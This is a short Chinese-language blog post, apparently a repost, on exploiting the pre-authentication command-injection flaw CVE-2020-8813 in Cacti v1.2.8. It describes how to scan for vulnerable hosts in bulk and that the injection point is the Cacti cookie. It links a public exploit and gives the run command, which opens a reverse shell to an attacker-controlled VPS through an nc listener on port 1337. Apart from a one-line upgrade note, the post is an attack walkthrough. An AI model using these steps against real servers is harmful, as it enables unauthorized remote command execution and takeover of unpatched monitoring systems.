Cacti v1.2.8(CVE-2020-8813)漏洞利用


0x00 簡介

 Cacti是一套基於PHP,MySQL,SNMP及RRDTool開發的網絡流量監測圖形分析工具。

 可以看到中國有2714個站點都使用了這個工具。覆蓋面還是比較廣。

0x01 影響范圍

受影響Cacti版本:Cacti v1.2.8

0x02 檢測

1、先判斷是否存在路徑:/graph_realtime.php?action=init ,能正常回顯說明存在。

2、再判斷回顯頁面文本中是否存在“poller_realtime.php”字樣,存在則存在漏洞。

也能訪問到poller_realtime.php

可用腳本批量檢測。

 0x03 存在點

漏洞存在點為登錄處的cookie處,變量Cacti的值,可將Cacti的值更改為系統命令,直接造成命令執行。

0x04 利用

exp下載:https://github.com/mhaskar/CVE-2020-8813

可用里面的第二個腳本:

python Cacti-preauth-rce.py http://xx.xx.xx.xx/cacti vps-host 1337

然后先在vps上開啟nc監聽端口1337,即可接收到反彈shell。

0x05 防范

更新Cacti版本至最新版 v1.2.9

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM